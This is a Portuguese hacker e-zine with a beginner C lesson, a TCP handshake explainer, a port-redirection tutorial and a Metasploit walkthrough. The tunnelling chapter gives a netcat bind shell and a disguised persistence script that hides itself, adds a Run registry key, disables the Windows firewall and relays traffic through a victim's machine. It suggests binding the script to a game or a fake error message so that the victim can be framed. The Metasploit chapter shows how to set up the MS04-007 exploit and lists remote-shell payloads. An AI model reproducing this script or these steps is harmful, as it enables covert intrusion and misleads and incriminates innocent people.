Mau a zine começou a ja existem caras com duvidas eheh, mas voce deve estar se perguntando: Mas como se a zine começou agora? Simples, passei 2 meses anunciando que a zine ia sair, dae apareceu uma porrada de email dos caras ja com duvidas HuahuHauhUha!!! Nem um filho da puta quiz mandar materia, vao tomar no cu pessoal hauhuahua!!! Brincadeira, vamos a unica duvida que achei melhor responder na zine do que no MSN, porque tem tudo aver com o curso de C, mas normalmente nao respondo perguntas aqui, pois esta nao e a seçao que vou responder duvidas, vai ter uma mail box e tals, normalzinha e show de bola Huahauha!!!.
=======================================================================
Mail <*****@bol.com.br>
Ei cara, estou com um probleminha aqui. O negocio e o seguinte:
To desenvolvendo ai um code que ler string e grava em um arquivo, se voce nao entendeu eu quiz dizer CADASTRADOR DE CLIENTE, e que eu to afim de ganhar uma grana ae com o C tambem, vi que isso e possivel em um tutorial que achei na internet, mas to tendo problema aqui, pois nao consigo gravar o arquivo com a string, putz grilo.....nem compilar eu to conseguindo, ei filho, se voce rir eu te mato, sabe que sou melhor que voce em Assembler, entao respeita ai os mais velhos pirralho hahahahahHauhuah. Sei mecher com ponteiro e o FILE, entao me poupe dos detalhes, Helpme, per favore velho, cê é muito foda entao ve se me ajuda ae.
RESPOSTA:
Ei tio, porque tu num mandou o code tb mula, como e que eu vou saber o que tu ta errando? Mas vamos la, deixa eu ver aqui, voce quer um cadastrador de cliente certo? e quer que os resultados sejam gravados no arquivo recem criado e pirralho e a mae!!!!! Vamos la, tenta isso ae, so que como putc obvio:
[Reposta para os leitores da minha zine]
#include <stdio.h>
#include <stdlib.h>
int main (void){
int x;
char vogais[100] = "AEIOU\n";
printf ("As vogais sao:");
for (x=0;vogais[x];x++){
printf ("%c", vogais[x]);}
system ("pause");
return (0);}
Quando voce for usar o printf para exibir varios caracteres um a um na tela usando a funcao for, tu teras que lelos usando
o leitor de caractere "%c"; Ja para escrever em arquivo tu teras que declarar a variavel que possui a string armazenada seguida do operador que executara a funcao "for" que nesse caso e o inteiro x*/
[Resposta para o tiozinho]
FILE *pt;
pt=fopen ("TIOZINHO.txt", "w");
if (!pt){
printf ("Nao conseguir escrever no arquivo TIOZINHO.txt\n");
system ("pause");
exit (0);}
else {
printf ("O arquivo TIOZINHO.txt foi aberto com sucesso...\n");
Sleep (1000);
system ("cls");
printf ("Digite o nome do cliente:");
scanf ("%s", cliente.nome);
char clin[100];
strcpy (clin, "Nome:");
strcat (clin, cliente.nome);
for (others.xXx=0; clin[others.xXx]; others.xXx++) putc (clin[others.xXx], pt);
printf ("O cliente de %s %s foi cadastrado com sucesso no arquivo TIOZINHO.txt \n\a", clin, cliente.nome);
system ("pause");
fclose (pt);}}
return (0);
}
Ei TIOZINHO, espero que voce note que criei estruturas no meu code e por isso faço referencias a elas (so criei porque vou ensinar logo mais hauhauah!!!), Ei Ei Ei, facilitei a tua vida ae maluco, fiz o code imprimir no database uma string predefinida
Nome:
Dae tu faz as adapt pra tuas necessidades. Num esquece do header <string.h> porque se tu num bota pode esquecer do strcat e strcpy, espero ter ajudado e se mesmo assim tu num consegui te mando o teu cadastrador de cliente prontinho Huahuahauh!!! 20 minutos e faço um muito loco, so preciso adaptar o que eu fiz em perl para o C ehehhe.
---------------- END MAIL BOX --------------------
Para colocar comentarios no C utilize // para apenas uma linha de comentario ou /* para abrir um sequencia de comentarios, para fechar a segunda auternativa utilize */. Apareceu uma biblioteca nova na area e duas funçoes. Vamos falar primeiramente da biblioteca stdlib.h ou simplesmente standard library que significa em portuga: Biblioteca padrao. Quando voce inclui esta biblioteca no seu codigo significa que voce esta afim de incluir alguma funçao que existe dentro dela :-) eheh (so pra relembrar), ou seja, reparem ae na funçao system. A funçao system e uma funçao contida na biblioteca stalib.h e que possibilita que se execute comandos do proprio OS na execuçao do codigo, voce podera fazer com que os comandos do sistema interajam com seu programa, neste caso depois que meu pequeno programa exibe o alfabeto na tela ele ira exibir a mensagem Pressione qualquer tecla para continuar... e ira pausar a execução do code apos o termino da exibiçao das letrinhas mais manjadas do mundo (aeiou). O comando pause quando digitado no prompt do DOS exibe esta mensagem.
Outra coisa que eu gostaria de lhes alertar:
Tome cuidado para nao esquecer de colocar o " ; " antes de declarar qualquer coisa, obvio que isso nao e regra, mas adiante voce entendera melhor. Reparem nesse trexos do code
int x;
char vogais[100] = "AEIOU\n";
printf ("As vogais sao:");
for (x=0;vogais[x];x++){
printf ("%c", vogais[x]);}
Declarei uma variavel do tipo char que possue 99 caracteres de espaco em seu buffer, 99? Isso mesmo, 99, porque o indice no C começa em 0, ou seja, se tivesse declarado uma variavel do tipo char com 10 de pilha, o 10 seria o 9. Tambem declarei a variavel x do tipo inteiro e utilizei o comando for para que continue a executar um bloco de codigo. Declarei que a variavel do tipo x possui um valor igual a 0 no for, depois declarei que a variavel que possue a string vai interagir com a execução do for, ou seja, posso escrever cada caractere contido na variavel vogais, pois estou utilizando o [x] que e o operador usado para continuar a execuçao dos comandos abaixo do for, e adicionei a variavel do tipo inteiro x dois sinais de mais "++" para ecrementar a operaçao, o ++ encrementa o valor da variavel cada vez que o looping e feito.
ESTRUTURAS EM C
Para criar uma estrutura use o struct nome_da_estrutura, uma strutura nada mais e que uma variavel que agrupa varias outras de varios tipos em uma so, como no exemplo abaixo.
#include <stdio.h>
#include <stdlib.h>
struct o_cara{
char nome[3];
int numero;
}david; //A variavel david do tipo struct possui esses campos acima
int main (){ //Vamos preencher os tais compos
david.numero = 10;
printf ("O numero %d", david.numero);
return (0);
}
Neste exemplo acima david e uma variavel do tipo estrutura que possue varios campos como o campo nome do tipo char e numero do tipo inteiro. Para fazer referencia a intens contidos dentro de uma estrutura basta utilizar:
variavel.campo_dentro_da_estrutura
david.numero.
O ponto "." e utilizado para fazer referencias a campos dentro de uma variavel do tipo struct, voce podera declarar varias variaveis do tipo struct e fazer referencia aos campos que as mesmas de certa forma "compartilham", assim:
#include <stdio.h>
#include <stdlib.h>
struct o_cara{
char nome[3];
int numero;
}david, grace;
int main (){
david.numero = 10;
grace.numero = 55;
printf ("\nMeu numero favorito e o: %d\n\a", david.numero);
printf ("O numero favorito de minha namorada e: %d\n\n", grace.numero);
system ("pause");
return (0);
}
Resultado:
Meu numero favorito e o:10
O numero favorito de minha namorada e o: 55
Pressione qualquer tecla para continuar.....
Chegamos ao final da primeira parte do curso de C, espero que tenham gostado e se quiserem coisas mais mastigadas manda um email ae que farei questao de ajudar. Ate a aula numero dois galera....
----- C4p1Tul0 07
[+ ====================================== +]
Entendendo o Three Way Handshake
6_Bl4ck9_f0x6
[+ ====================================== +]
Aprendi a pouco tempo e gostaria de ensinalos, ei ei ei, Cloudy, descobri que uma de suas fontes de estudo foi o livro universidade hacker ehehe, vi uma leve adaptaçao feita por voce tendo como base o exemplo do fabricio (me refiro a como se parece um ISN), eu dei uma melhorada neste texto, comparado ao que eu tinha postado no forum, e dei uma encrementadinha no final, em umas das flags citadas no forum. Galera.... esse capitulo ta show de bola!!!
Three Way HandShake
Quando uma maquina pretende se conectar a outra no TCP primeiramente ela faz um pedido de conexao sinalizando isso com o que nos chamamos de flag, que na mais e que um pacote que a mesma emite para o host remoto dizendo que deseja estabelecer uma conexao neste host em alguma porta que ele esteja escutando, o cliente emite o que nos chamamos de pacote de sincronismo, ou simplesmente SYN, que vem de synchronize (sincronizar). O pacote SYN e o primeiro passo para iniciar qualquer conexao por TCP, o cliente emite este pacote e aguarda uma resposta do host remoto. Pois bem, quando a maquina que solicitou a conexao (a maquina que emitiu o SYN) evia um pacote com uma flag de sincronismo, ela tera que esperar uma resposta do host remoto (obvio), esta resposta vem com um segundo pacote SYN e um outro pacote, mas so que dessa vez o pacote e o ACK, que vem de ACKnowledge, este pacote e emitido quando o servidor recebe o pacote com a flag SYN, pois ele tera que retornar uma resposta, ou seja, quando uma maquina emite este pacote ela esta dizendo que recebeu e aceitou o pacote anterior, isso funciona mais ou menos assim:
Cliente [Quero me conectar em uma porta sua!!! (SYN)] ------------------ > Host remoto (huuuum...)
Host remoto [Tudo bem, eu deixo!!! (SYN+ACK)] ----------------------- > Cliente (vixi!, ele deixou, hauhuah)
Cliente [Entao la vai!! (ACK)] --------------------------------------------- > Host remoto (empurrou com tudo huahua!!)
Sacou porque isso se chama "Three" Way Handshake? Simplesmente porque antes de qualquer conexao (aperto de maos) e necessario a negociaçao em tres vias. Quero passar um conhecimento mais profundo dos tres passos para voces estranhos e para o meu amorzinho que esta estudando informatica (minha mina), entao (para a felicidade de minha namorada :- ), maos a obra eheh.
ISN - Internet Sequencial Number (Se aprofundando mais no negocio)
Internet Sequencial Number ou simplesmente numero sequencial da internet, e como eu posso dizer... O que faz as coisas acontecerem no Handshake, isso mesmo, nao mencionei ele anteriormente, mas ele faz parte sim do negocio, siga essa ilustraçao abaixo.
Ilustraçao de uma conexao bem sucedida entre dois hosts
Hacker [SYN+ISN] --------------- > Alvo
Alvo [SYN+ACK+ISN] ---------- > Hacker
Hacker [ACK+ISN] -------------- > Alvo
Hum, esta ilustraçao acima ta muito fraca e nao mostra como as coisas funcionam na realidade, entao vamos deixar a proxima ilustraçao um pouco mais complexa, ou "aparentemente" mais complexa (apenas preste atencao).
Hacker [SYN, Seq= 785x 4fc0] -------------------------- > Alvo
Alvo [SYN, Seq= 786x 5gc0+ACK, Seq=785x 4fc0 +1] --------------- > Hacker
Hacker [ACK, Seq= 786x 5gc0 +1] ---------------------- > Alvo
Acima estou mostrando como realmente a coisa acontece. Primeiramente o Hacker que deseja se conectar em uma porta em escuta no alvo emite um pacote com a flag SYN mais um numero de sequencia, este numero (ISN), é quem vai auxiliar o alvo como guia para o mesmo saber quem ele vai responder e a quem ele vai pedir algum pacote caso o mesmo venha a atrazar no seu emcaminhamento. Pois bem, como voce pode ver acima, o hacker manda alem do syn uma sequencia igual a 785x 4fc0 para o alvo, o alvo recebe o syn com a sequencia que foi gerada pelo Hacker (785x 4fc0) e no caso de existir realmente uma porta em escuta, emite outro pacote com a flag syn com um ISN igual a 786x 5gc0 para o hacker (para sincronizar a conexao) e tambem manda um ACK com os mesmos numeros de sequencia enviado anteriormente (785x 4fc0) +1 para dizer que recebeu e aceitou o pacote anterirmente enviado (SYN). Repare na semelhança desses ISNs
Hacker 785x 4fc0 ------ 785 4f
Alvo 786x 5gc0 ------ 786 5g
Fiz esta ilustraçao apenas como exemplo, mas da pra entender bastante. Prestem atençao que alem do pacote ACK com a mesma sequencia gerada anteriormente pelo Hacker e +1, o alvo emite um novo ISN com numeros sequenciais, dae o nome: Internet "Sequencial" number, reparou no sequencial? eheheh Quando o alvo emite um SYN com os numeros sequenciais do enviado pelo Hacker sigifica que ele está disposto a interagir, ou seja, quer proceguir com a conexao.
Logo após o recebimento do pacote SYN com a sequencia 786x 5gc0 gerada pelo alvo e o ACK com o mesmo numero de sequencia que tinha mandado anteriormente, a estaçao do hacker entao manda outro pacote com a flag ACK com os mesmos numeros de sequencia (786x 5gc0) enviados pelo host e +1 para dizer que ele recebeu o pacote anterior, agora sim o hacker podera estabelecer uma conexao com o alvo em uma porta qualquer que o mesmo venha a estar escutando.
Sabendo quando uma porta TCP está fechada
Como voce ja deve ter percebido, em uma conexao TCP quando uma porta esta aberta o host remoto emite um SYN+ACK como resposta a um pedido de conexao, mas como saber se uma porta TCP esta fechada? Simples, para sabermos distiguir apenas precisaremos conhecer a flag RST, que vem de RESET, assim bastaria testar as regras de saida do firewall para sabermos se uma determinada porta está ou não em escuta. A flag RST é emitida por um host como resposta a um TCP connect em uma porta que o mesmo nao esteja escutando, ou seja, a tal porta muito provavelmente está sendo filtrada por um firewall. Resumindo: Caso a porta esteja fechada o host manda um pacote ACK seguido do ISN emitido pelo cliente e +1 para dizer que recebeu o pacote anterior, e envia junto com esse pacote o RST para resetar a conexao.
Sabendo quando uma porta UDP está fechada
[Isso aqui não faz parte do handshake não, so escrevi para voce ter mais conhecimento]
O método de saber se uma porta UDP está em escuta ou não em um host remoto é um pouco diferente do usado pelo TCP, ou seja, ao invés de ser enviado um SYN e esperar um SYN/ACK para determinar a porta aberta e um ACK/RST para uma porta fechada, no UDP o cliente envia um pacote UDP para uma porta do host, se for emitido como resposta um pacote ICMP de porta inalcansável (unreachable), a porta está fechada, caso contrario, evidentemente ela estará aberta (listenning).
Vou dar uma encrementada ae "por cima" (como diz o cloudy) com outras flags que sao muito comuns:
Finish - FIN: Finaliza uma conexão. Quando uma das estacoes emite um pacote com esta flag no final de uma transmissao TCP/IP (sempre no final, dã), significa que ela nao tem mais nada para ser enviado e está querendo encerrar a conexao, mas a estacao cliente ainda tem que esperar uma resposta do servidor para finalmente encerrar a conexao, pois o servidor pode pedir uma retransmissao dos dados caso algum pacote venha a chegar corrompido ate ele. Numa conexao TCP é muito comum um pedido de retransmissao, pois os pacotes pode ter sido corrompidos em algum momento no decorrer de seu trajeto pelos pontos de passagem (coisa que nao e muito dificio de acontecer). Se o servidor responder a um FIN com um ACK (Acknowledgement - "entendido") coisa que ele so fara quando receber todos os pacotes com seus devidos headers intactos, dae sim o cliente pode enviar o ultimo pacote de confirmaçao e acabar com a conversa eheh.
As outras duas flags vou deixar com voces,
vou passar a tarefa de pesquisar "afundo" sobre as mesmas,
se quer moleza vai senter no pudim HuahuHuah!!!
Urgent - URG: Essa flag sinaliza "Urgência na conexão".
Push - PSH: Acelera a transmissão pra poder finaliza-la. Imagine o PSH como uma descarga de merda (quiz dizer agua na merda), e isso mesmo. A descarga enche de agua de uma hora pra outra o buraco do vaso, quando voce puxa a corda derrepente toda a merda vai pelo buraco da privada "que nao conheço o nome tecnico para esse troço", assim levando a merda embora para o reino encantado das merdas. Isso ocorreu porque eu dei velocidade a decida da agua que vai jogar a merda embora antes de mechela um pouquinho, sacou mano?
----- C4p1Tul0 08
[+ ======================================== +]
Tunelando conexões - Port redirect - Criando ponte para invasoes
6_Bl4ck9_f0x6
[+ ======================================= +]
E ae galera da segurança, estou trazendo ae "pra quem ainda nao conhece" uma boa dica para facilitar a vidade de voces, pois as vezes voce precisa acessar recursos de uma maquina dentro de uma NAT, mas como os endereços IPs atribuidos as maquinas filtradas por NAT nao sao roteaveis voce e obrigado a hospedar os tais recursos na DMZ ou acessar as maquinas da NAT usando algum tipo de software de assitencia remota pela DMZ, eu mesmo quando trabalhava com vendas de acessorios de informatica tinha de depositar varias informaçoes com relaçao as minhas vendas em computadores de uma NAT, sendo assim precisei acessar maquinas em uma NAT por um host na DMZ e ter que transformar uma DMZ em workstation e muito mais demorado do que se voce acessase tais recursos diretamente do host. Mas esse negocio de criar ponte workstation ja esta ultrapassado, o tempo de ficar mapeando unidades de rede pela DMZ para depois acessalas ja se foi. Ao inves de voce usar uma ponte (WorkS) pela DMZ porque nao ser redirecionado automaticamente para uma NAT e trabalhar diretamente nela? É isso que eu vou demonstrar agora. Tunelar diretamente o NetBIOS tambem é bastante interesante mas nao vem ao caso agora, pois vou demonstrar um modo generico, vamos logo falar da tecnica que mais estudo na vida, lembrando que vou passar o basicao do tunelamento, pois se fosse falar detalhadamente deste assunto com toda certeza gastaria mais ou menos um dia "sem parar" escrevendo, o tunelamento nao se resume apenas nisto, gostaria que voces estudasem tambem para podermos aperfeiçoar a tecnica, gostaria muito de sua ajuda.
O programa que utilizarei e o fpipe para windows que e um programa bastante simples e vai ser mais facil demonstrar. Mas obvio que existem varios outro programas tao bons quanto o fpipe para ambientes Unix como o Corkscrew (saca-rolhas) que é uma ferramenta que tunela SSH para além e para aquém do proxy em HTTP. Os principais proxys que ele abre uma rota sao o Squid, Apache’s mod proxy e varios outros, mas vamos nos concentrar no fpipe.
Segue abaixo uma ajuda traduzida e adaptada por mim.
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/
FPipe [-hvu?] [-lrs <port>] [-i IP] IP
-?/-h - Exibe este texto de ajuda
-c - Numero maximo de conexoes TCP permitidas. Padrao é 32
-i - Seta uma interface de rede (Redireciona pra qualquer seguimento)
-l - Escuta um numeo de porta
-r - Usado para designar uma porta em listenning no host remoto.
-s - outbound source port number
-u - Modo UDP
-v - verbose mode
Vamos la, este e o senario:
Local Machine <----------> FPipe server <---------> Remote machine
Inbound Outbound
connection connection
Voce quer acessar uma maquina da NAT que tem o endereço IP 192.168.1.1 na porta TCP 666, então voce faz isso no host na DMZ:
C:\Documents and Settings\David>fpipe -l 289 -r 666 192.168.1.1 -vv
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/
Listening for TCP connections on 0.0.0.0 port 289
Neste exemplo vou me conectar no meu proprio host utilizando uma porta que o netcat esta escutando. O procedimento e o normal viu galera, telnet 192.168.1.1 289 (meu host, "netcat"). Apos a conexao será exibido o seguinte:
Listening for TCP connections on 0.0.0.0 port 289
Connection accepted from 192.168.1.1 port 1121
Attempting to connect to 192.168.1.1 port 1121
Pipe connected:
In: 192.168.1.1:1121 --> 192.168.1.1:289
Out: 192.168.1.1:1122 --> 192.168.1.1:666
115 bytes received from outbound connection
E lá no netcat:
=====================================
Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\David>echo Olha o shell ae gente!!!
=====================================
Ou seja, shell do host da NAT. Analise as portas usadas com um netstat, no meu caso o resultado foi esse:
C:\Documents and Settings\David>netstat -an -p tcp | find "ESTABLISHED"
TCP 192.168.1.1:289 192.168.1.1:1121 ESTABLISHED
TCP 192.168.1.1:666 192.168.1.1:1122 ESTABLISHED
TCP 192.168.1.1:1121 192.168.1.1:289 ESTABLISHED
TCP 192.168.1.1:1122 192.168.1.1:666 ESTABLISHED
Veja outro exemplo:
C:\Documents and Settings\Administrador>fpipe -l 888 -vv -r 425 192.168.1.1
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com/
Listening for TCP connections on 0.0.0.0 port 888 //Esperando uma conexao TCP na porta 888
Connection accepted from 192.168.1.14 port 1087 //A Conexao do host 192.168.1.14 foi aceita na porta 1087
Attempting to connect to 192.168.1.14 port 1087
Pipe connected:
In: 192.168.1.14:1087 --> 192.168.1.1:888 //O IP 192.168.1.14 acessou meu host na porta 888
Out: 192.168.1.1:1165 --> 192.168.1.1:425 //Aqui ele foi redirecionado para a porta 425 do host 192.168.1.1
123 bytes received from outbound connection
Host 192.168.1.14:
=====================================
Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\David>echo Olha outro shell ae gente!!!
=====================================
Olha de quem que o netcat pega o IP:
C:\Documents and Settings\Administrador>nc -l -p 425 -vv -e cmd.exe
listening on [any] 425 ...
connect to [192.168.1.1] from Violator [192.168.1.1] 1165
Ou seja, o hacker se conectou na maquina que estava com o fpipe em escuta, e quando ele se conecta o netcat mostra que a conexao veio do PC que tava rodando o cano para a conexao e nao o IP do invasor (acredito que saber disso vai ser muito importante para voces :- ). Voce pode deixar algum script em batch compilado em aplicaçao fantasma no host do cara que sempre fique com uma porta em listening pelo fpipe e que te redirecione apos o acesso para um outro endereço IP quando voce se conectar nesta porta, voce pode ser redirecionado para outro host com o IP dele, tipo pra incriminar o cara, ou para dar uma segunda camada de segurança ao invasor. Basta usar um binder e juntar o script com algum joguinho e mandar para o cara que voce vai usar de ponte. Ou mande apenas o script com fake msg do winrar, dizendo algo do tipo: arquivo corrompido. Voce pode ate mesmo compilar ele e manda ele purinho. O script que se incializa pode ser escrito mais ou menos assim:
<ponte.exe>
Rem - Nao preciso de @echo off porque ele vai estar compilado em Ghost Application
copy ponte.exe c:\ /y //Copia pro C: e substitui o arquivo ja existem sem perguntar
attrib +H c:\ponte.exe //O attrib e o comando que define um atributo juntamente com os sinais + add - retirar
reg add HKLM\software\microsoft\windows\currentversion\run /v ponte /t REG_SZ /d "c:\ponte.exe" /f //add no registro
net stop sharedaccess //Desabilita o firewall do XP
fpipe -l 8080 -s 1162 -r 21 X.X.X.X //Escuta na porta 8080, tenta abrir a porta 1162 que supostamente seria uma porta romdomica, pois o firewall deixa essas portas serem abertas sem alertar o usuario, porque essas portas normamente sao utilizadas quando voce abre o browser para acessar a internet, (quando essas tais portas se abrem a maioria dos firewalls as ignoram) e logo depois me redireciona para a porta 21 do host X.X.X.X, quando eu der um TCP Conect na porta 8080 eu sou redirecionado para o servidor de FTP do Host X.X.X.X e nao tenho o meu IP capturado, pois o IP que o host X.X.X.X vai logar e o do cara que to usando como ponte.
Voce ficara impressionado em saber o que o tunelamento e capaz de fazer juntamente com o netcat, tunelar com shell reverso é uma pratica bastante interesante. Gostaria que postasem ideias com relaçao ao netcat e ao tunelamento, pois o netcat tambem nao se resume em port scan, sniffer e essas babozeiras que ta todo mundo acostumado a ler por ai, espero que posam avançar nos estudos destas duas ferramentas e em proximos textos mostrarei as magicas que eu sou capaz de fazer com essas ferramentas, espero que tenham gostado do meu post e falow.
E como disse um "filho da puta frances" chamado "rog", o ssh tambem e interesante, porque com o ssh da para lançar o comando da ponte no proprio pc cliente (tendo autorizaçao no pc ponte é claro) huahuahauhHuahu!!! Aquele trouxa.
Pra quem nao conhece o tal do rog, ele foi o cara que desenvolveu o cgi logger do Optix pro, ou seja, a parte mais tosca do trojan foi ele que desenvolveu, por isso ele se acha no direito de ficar falando merda pra todo mundo. Cara, te manca, tu nem "Brasileiro" é filho da puta, num te mete com brasileiro naum cara, gringo trouxa. Lammer é foda mesmo, o cara sai dizendo aos quatro cantos do mundo que fez o CGI logger do Optix, e depois posta em sites de segurança como remover o trojan. Voces ouviram o que eu disse?
O cara ajuda os malucos a fazer e depois sair postando o "perigo" que o Optix representa.
Filho da puta!!! Que cretino mais tosco meu irmao, esse seria o ultimo cara que me ajudaria no desenvolvimento de um trojan. Traira do caralho, e ainda e metido a mauricinho dizendo que fez dezenas de cursos superiores na franca e que ganha muito bem la fazendo so deus sabe o que com os computadores dos trouxas que o contratam. Esse sugeito nao sabe e de nada, convido todos voces a dar um pulinho no forum darkers e procurar um topico meu de nome:
Super especial: Metodos de prevençao e reçao a ataque do tipo D.D.O.S
O sugeito so da rata vei, num sabe nem os termos corretos e quer ser o gostoso do darkers, so porque deram algumas estrelinhas de outro pra ele. A unica coisa que o infeliz manja e em PHP e CGI, e mesmo assim so desenvolve porcarias.
----- C4p1Tul0 09
//--//--//--//--//--//--// METASPLOIT //--//--//--//--//--//--//
||============#||O ABRIGO DOS EXPLOITS||#=================#||
6_BL4CK9_F0X6
Ao invés de você sair por ai procurando códigos de exploits para depois compilá-los, veja se ele não existe neste excelente repositório de exploits, me recuso a chamá-lo de scanner de vulnerabilidades, vale lembrar que os exploits normalmente são distribuídos em código fonte C ou Perl e para compilar a maioria deles você precisará ter um certo conhecimento em programação caso dê erro, mas fique tranqüilo, agora você não precisa se preocupar mais com isso quando for testar a segurança de sua rede, porque existe este excelente programa que faz tudo isso pra você e ainda por cima possui uma GUI e também possui um console pra quem gostar do lado obscuro por assim dizer dos programas (que e o que vamos utilizar), estou me referindo ao Metasploit Frameork, atualmente na versão 3.0, para usá-lo em sua forma mais simples basta colocar o IP do alvo e clicar em Launch Exploit e esperar o Shell, simples não acha? Agora vou demonstrar como essa fantástica ferramenta funciona para você checar a segurança de sua rede com todo o conforto que o metasploit pode lhe proporcionar, sem contar que o mesmo ainda disponibiliza varias otras subferramentas como farejadores de rede, etc. Vou utilizar a versao 2.7 do metasploit para Unix, mas tambem existem versoes dele para windows. Passei o nessus em um host na minha rede e o mesmo me forneceu um relatorio com diversas falhas neste host, dei uma picotada no log que o nessus gerou e extrai apenas a vulnerabilidade que iremos explorar, analise e veja o que a falha possibilita a um invasor:
Synopsis :
Arbitrary code can be executed on the remote host.
Description :
The remote Windows host has a ASN.1 library which is vulnerable to a
flaw which could allow an attacker to execute arbitrary code on this host.
To exploit this flaw, an attacker would need to send a specially crafted
ASN.1 encoded packet with improperly advertised lengths.
This particular check sent a malformed NTLM packet and determined that
the remote host is not patched.
Solution:
http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx
Risk Factor :
Critical / CVSS Base Score : 10
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)
CVE : CVE-2003-0818
BID : 9633, 9635, 9743, 13300
Other references : IAVA:2004-A-0001
Plugin ID : 12054
Repare na linha: Arbitrary code can be executed on the remote host
Vamos agora botar a mao na massa e colocar o metasploit pra trabalhar, primeiramente entre no diretorio do metasploit com o comando cd diretorio (dã), agora vamos compilar o console que esta escrito em perl, ou seja: perl msfconsole, apos isso voce terá o seguinte resultado:
Black_Fox@BlackMachine:~/Desktop/temp/framework-2.7$ perl msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf >
Este é o shell do metasploit, agora vamos mecher um pouco nele. As traduções abaixo foram feitas por mim, por isso pode confiar hauhauhauah!!!. Digite help para obter uma lista com os comandos disponiveis, originalmente você terá uma descrição em ingles de comando comando, mas como eu já avia falado anteriormente, eu traduzi e fiz algumas adaptações no texto.
msf > help
Metasploit Framework Main Console Help
======================================
? Exibe esta lista de comandos
cd Muda o diretorio de trabalho
exit Sai do console do metasploit
help Exibe esta lista de comandos
info Exibe detalhes do exploit ou informações do payload
quit Sai do console do metasploit
reload Recarrega exploits e payloads
save Salva as configurações no disco
setg Seleciona uma variavel de ambiente global
show Exibe exploits e payloads disponiveis
unsetg Remove uma variavel de ambiente global
use Seleciona o exploit pelo nome
version Exibe a versão do console
Para ver os exploits disponiveis digite 'show exploits'
msf > show exploits
[Editei a lista, pois sao muuuuuuuitos exploits]
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
backupexec_dump Veritas Backup Exec Windows Remote File Access
backupexec_ns Veritas Backup Exec Name Service Overflow
backupexec_registry Veritas Backup Exec Server Registry Access
badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
barracuda_img_exec Barracuda IMG.PL Remote Command Execution
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
Vou setar o exploit que exploita falha no host remoto, ou seja:
Nome interno do exploit Nome externo
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
Para selecionarmos este exploit digite:
msf > use msasn1_ms04_007_killbill //Enter
msf msasn1_ms04_007_killbill > //Exploit setado
Agora vamos ver mais ajudas com relação a comandos do metasploit, pois quando estamos com um exploit setado a ajuda muda um pouco de figura, vamos ver o que vai aparecer de novo:
Metasploit Framework Exploit Console Help
======================================
? Exibe esta lista de comandos
back Drop back to the main menu
cd Muda o diretorio de trabalho
check Perform vulnerability check
exit Sai do console
exploit Executa o exploit atual
help Exibe esta lista de comandos
info Exibe detalhes do exploit ou informações do payload
quit Sai do console
rcheck Perform vulnerability check
reload Recarrega exploits e payloads
rexploit Reload and exploit, for us tester types
save Save configuration to disk
set Seleciona uma variavel de ambiente temporaria
setg Seleciona uma variavel de ambiente global
show Exibe opções, avançado, payloads, ou alvos
unset Remove a temporary environment variable
unsetg Remove a global environment variable
use Seleciona um exploit pelo nome
version Exibe a versão do console
Vamos obter informações de uso deste exploit, ou seja, quais os requerimentos necessarios para a execução do mesmo:
msf > use msasn1_ms04_007_killbill
msf msasn1_ms04_007_killbill >show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ---------------------------
optional SSL The target service uses SSL /Opcional
required RHOST The target address /Requerido (obrigatorio)
required RPORT 445 The target service port /Requerido (obrigatorio)
required PROTO smb Protocol (smb or http) /Requerido (obrigatorio)
Target: Windows 2000 SP2-SP4 + Windows XP SP0-SP1
Para podermos executar o mesmo obviamente que temos que selecionar o alvo (RHOST - Host remoto), a porta (RPORT - Porta remota), e para este exploit funcionar se faz necessaria a seleção de um protocolo (smb), agora vamos setar o payload, para ver uma lista de payloads disponiveis digite:
msf msasn1_ms04_007_killbill > show PAYLOADS
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
